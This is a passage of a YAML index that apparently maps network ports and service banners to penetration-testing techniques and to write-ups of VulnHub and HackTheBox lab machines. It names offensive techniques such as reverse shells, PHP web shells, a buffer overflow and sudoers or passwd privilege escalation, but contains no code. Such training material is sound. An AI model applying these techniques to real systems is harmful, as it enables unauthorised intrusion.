        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf
        verbose_id: vulnhub#323
      - name: 'FristiLeaks: 1.3'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
        verbose_id: vulnhub#133
      - name: 'hackme: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf
        verbose_id: vulnhub#330
      - name: 'IMF: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf
        verbose_id: vulnhub#162
      - name: 'InfoSec Prep: OSCP'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf
        verbose_id: vulnhub#508
      - name: 'Kioptrix: Level 1.1 (#2)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf
        verbose_id: vulnhub#23
      - name: 'Kioptrix: Level 1.2 (#3)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf
        verbose_id: vulnhub#24
      - name: 'Kioptrix: Level 1.3 (#4)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
        verbose_id: vulnhub#25
      - name: 'Kioptrix: 2014 (#5)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
        verbose_id: vulnhub#62
      - name: 'LazySysAdmin: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
        verbose_id: vulnhub#205
      - name: 'Mr-Robot: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf
        verbose_id: vulnhub#151
      - name: 'hackfest2016: Quaoar'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
        verbose_id: vulnhub#180
      - name: 'hackfest2016: Sedna'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
        verbose_id: vulnhub#181
    '8080':
      l4: tcp
      port: '8080'
      protokeys:
      - http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
      - http/Apache httpd 2.4.29 ((Ubuntu))
      - http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
      ttps:
      - enumerate_app_apache
      - enumerate_app_apache_tomcat
      - enumerate_app_coldfusion_files
      - enumerate_app_coldfusion_version
      - enumerate_app_drupal
      - enumerate_app_joomla
      - enumerate_app_phpmyadmin
      - enumerate_app_prtg
      - enumerate_app_webmin
      - enumerate_app_wordpress
      - enumerate_proto_http
      - enumerate_proto_rdp
      - enumerate_proto_webdav
      ttpsitw:
      - enumerate_proto_http
      - exploit_bash_reverseshell
      - exploit_cloudme_bof
      - exploit_gymsystem_rce
      - exploit_php_webshell
      - exploit_phptax
      - privesc_freebsd
      - privesc_passwd_writable
      - privesc_sudoers
      writeups:
      - name: Buff
        url: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf
        verbose_id: hackthebox#263
      - name: 'Kioptrix: 2014 (#5)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
        verbose_id: vulnhub#62
      - name: 'Misdirection: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
        verbose_id: vulnhub#371
    '9999':
      l4: tcp
      port: '9999'
      protokeys:
      - abyss?
      ttps: []
      ttpsitw:
      - privesc_anansi
      - privesc_sudo
      writeups:
      - name: 'Brainpan: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
        verbose_id: vulnhub#51